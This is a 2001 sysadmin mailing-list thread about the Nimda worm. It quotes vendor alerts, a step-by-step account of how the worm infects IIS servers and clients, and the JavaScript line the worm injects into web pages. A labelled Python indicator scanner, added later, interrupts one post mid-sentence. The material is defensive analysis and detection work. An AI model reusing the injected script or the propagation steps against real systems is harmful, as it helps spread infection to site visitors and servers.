RE: FW: Worm probes

2001-09-18 Thread RZorz
Title: RE: FW: Worm probes

From Panda (note they won't have a sig file for a few hours yet):
Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originating in China, which spreads through e-mail and is automatically executed simply by previewing the message that contains it.

To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in the Internet Explorer 5 browser, as well as the Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed.

Due to this threat, Panda Software recommends following the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with additional info about the virus.


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM
To: NT System Admin Issues
Subject: Fw: FW: Worm probes

Here's one from a thread on nanog


HTH,


Geoff


- Original Message -
From: Jim Olsen [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, September 18, 2001 11:03 AM
Subject: Re: FW: Worm probes

This is the information I've collected thus far on W32.nimda:

W32.nimda is NOT a Code Red variant, and the people referring to it as
"Code Blue" were mistaken...

The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses
several vulnerabilities in Windows NT and 2000 servers to infect a server,
and also employs email and web site mobile code to infect Windows
9x/ME/NT/2k boxes.

During the initial infection of a server, the worm does the following:
- downloads a file named "admin.dll" via tftp from the system that is
  trying to infect the target
- adds the guest account to the local administrators group and
  activates the account
- makes sure c$ is shared out
- copies itself to c, d, and e drives
- tries to mail itself to email addresses that it discovers on the
  server
- creates a file named readme.exe, which is used in the mobile code
  inserted on the web sites below
- adds this string to the web pages found on the server:
  <html><script language="JavaScript">window.open("readme.eml", null,
  "resizable=no,top=6000,left=6000")</script></html>
- scans for and infects other vulnerable IIS servers
- goes through all shared directories and puts sample.nws,
  sample.eml, desktop.eml, desktop.nws in each directory. These are eml
  messages with copies of itself (readme.exe) autoloaded by the mobile html
  code mentioned above.
- goes through all shared directories and puts riched20.dll in each
  directory, which is a trojan dll version of W32.nimda that is meant to
  infect people running notepad/wordpad in that directory.
- puts a trojan mmc.exe in the winnt directory that is a copy of
  itself in the above "readme.exe" format (win2000 only)

If a user views a web site that is hosted on an infected server, the
following happens:
- upon viewing an infected page, the mobile code extracts to
  readme.exe and starts in Windows Media Player (without user intervention)
- the user's machine becomes infected with W32.nimda at this point
  in time
- the worm starts scanning for other vulnerable IIS servers
- the worm emails itself to everyone in the user's address book
- goes through all shared directories and puts sample.nws,
  sample.eml, desktop.eml, desktop.nws in each directory. These are eml
  messages with copies of itself (readme.exe) autoloaded by the mobile html
  code mentioned above.
- goes through all shared directories and puts riched20.dll in each
  directory, which is a trojan dll version of W32.nimda that is meant to
  infect people running notepad/wordpad in that directory.
- puts a trojan mmc.exe in the winnt directory that is a copy of
  itself in the above "readme.exe" format (win2000 only)

It is unknown to me what happens (at this point in time) if a user opens an
attachment that is sent from an infected site. It is possible that it could
automatically infect the user's computer using the same methods mentioned
above.

EVERYONE who uses Internet Explorer to browse the internet should probably do
one of two things to stop from being automatically infected by W32.nimda (I
have not tested whether or not turning off JavaScript fixes the problem):
o) don't browse web pages until Microsoft releases a patch
o) turn OFF JavaScript

EVERYONE who uses Outlook/Outlook Express should, at the very least, not open
any attachments that they are not expecting. Turning off auto-preview
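
A quick sweep for the artifacts Jim lists, as an added example that is not part of the original thread or of any vendor tool. It is Python; the file names (readme.eml, readme.exe, sample.eml/.nws, desktop.eml/.nws, admin.dll, riched20.dll, mmc.exe) and the injected window.open("readme.eml") script come from the post above, while the directory layout, the sample files and the function names scan_tree, build_demo_tree and run_demo are constructed here for the demo. The two system file names are only flagged outside their normal location, since both exist legitimately in winnt\system32.

```python
import os
import re
import tempfile

# File names the post says Nimda drops (matched case-insensitively).
DROPPED_FILES = {
    "readme.eml", "readme.exe", "sample.eml", "sample.nws",
    "desktop.eml", "desktop.nws", "admin.dll",
}
WEB_EXTENSIONS = {".htm", ".html", ".asp"}
# The <script> the post says is appended to served pages; matched loosely,
# since quoting and whitespace vary between copies of the snippet.
INJECT_RE = re.compile(r"window\.open\(\s*['\"]?readme\.eml['\"]?", re.IGNORECASE)


def scan_tree(root):
    """Walk *root* and return sorted (kind, relative_path) pairs for each indicator."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        parent = os.path.basename(dirpath).lower()
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            low = name.lower()
            if low in DROPPED_FILES:
                findings.append(("dropped-file", rel))
            # riched20.dll is legitimate in system32; anywhere else (a share,
            # a document folder) it is the trojan DLL the post describes.
            elif low == "riched20.dll" and parent != "system32":
                findings.append(("trojan-riched20", rel))
            # mmc.exe normally lives in winnt\system32, not in winnt itself.
            elif low == "mmc.exe" and parent == "winnt":
                findings.append(("trojan-mmc", rel))
            elif os.path.splitext(low)[1] in WEB_EXTENSIONS:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    if INJECT_RE.search(fh.read()):
                        findings.append(("injected-script", rel))
    return sorted(findings)


def build_demo_tree(root):
    """Create a constructed sample layout (assumption for the demo, not a real infection)."""
    layout = {
        "inetpub/wwwroot/default.htm":
            "<html><body>hello</body></html>\n"
            '<html><script language="JavaScript">window.open("readme.eml", '
            'null, "resizable=no,top=6000,left=6000")</script></html>',
        "inetpub/wwwroot/about.html": "<html><body>clean page</body></html>",
        "inetpub/wwwroot/readme.eml": "MIME-Version: 1.0\n",
        "share/docs/sample.eml": "MIME-Version: 1.0\n",
        "share/docs/riched20.dll": "MZ",
        "winnt/system32/riched20.dll": "MZ",   # legitimate location, must not fire
        "winnt/mmc.exe": "MZ",
    }
    for rel, content in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def run_demo():
    """Build the sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for kind, rel in run_demo():
        print(f"{kind:16} {rel}")
```

On a real box point scan_tree at the web root, every share and the system drive. This is a file-name and string check, not a signature: a renamed dropper is not caught, and a hit should be confirmed against the AV signatures the vendors are shipping. It also says nothing about the Guest account or the C$ share Jim mentions; those still have to be checked by hand.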

RE: FW: Worm probes

2001-09-18 Thread RZorz
Title: RE: FW: Worm probes



reg hack to not execute perhaps?

-Original Message-
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:57 PM
To: NT System Admin Issues
Subject: RE: FW: Worm probes

RE: FW: Worm probes

2001-09-18 Thread RZorz
Title: RE: FW: Worm probes

Name: Nimda
Alias: W32/Nimda
Virus Categories: WORM (E-MAIL)
Virus Families: W32 GROUP
Repairable: Yes
Date of Appearance: 09/18/2001
Included in the "Wild List": No
Activation Condition
Basic Information: W32/Nimda is a worm that spreads by e-mail and exploits a
vulnerability in Windows 98 and Windows 2000 that makes it possible to run
Audio/X-wav files through Windows Explorer. To ensure its propagation, this worm
sends out a message that includes an attachment with the following name:
README.EXE. This file pretends to be an Audio/X-wav file coded in Base64 format.
After being decoded, the executable file that contains the worm is 57344 bytes
long.
One of the actions carried out by this worm consists of sharing the drive C:
of the affected computer in order to spread to other network drives.

Means of Propagation: This worm uses e-mail to spread to other systems. To do
this it sends out messages containing an attachment with the following name:
README.EXE.

Symptoms of Infection: This worm creates several files in the Windows
temporary directory. Although the content of these files is basically very
similar to the original file, it does present certain variations. Additionally,
it creates a file called Wininit.ini in the Windows directory.
The worm is coded to download a file called Admin.dll. To do this it uses an
application called Tftp.exe. Finally, the worm creates a new user through which
it shares the C drive and attempts to spread to other network drives.
Additionally, it exploits a vulnerability in Windows 98 and Windows 2000 that
makes it possible to run Audio/X-wav files through Windows Explorer.

-Original Message-
From: Ray Zorz
Sent: Tuesday, September 18, 2001 12:58 PM
To: NT System Admin Issues
Subject: RE: FW: Worm probes

reg hack to not execute perhaps?
RE: FW: Worm probes

2001-09-18 Thread John Cesta - Lists
Title: RE: FW: Worm probes

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:26 PM
To: NT System Admin Issues
Subject: RE: FW: Worm probes

From Panda (note they won't have a sig file for a few hours yet):
Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originating in China, which spreads through e-mail and is automatically executed simply by previewing the message that contains it.

To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in the Internet Explorer 5 browser, as well as the Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed.

I am not so sure that this assessment is entirely correct. For example, in my situation, I have a PC with Outlook 2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not I wish to save the file to disk - the README.EXE file that is. I just click cancel and then delete the email. I do not contract the virus.

John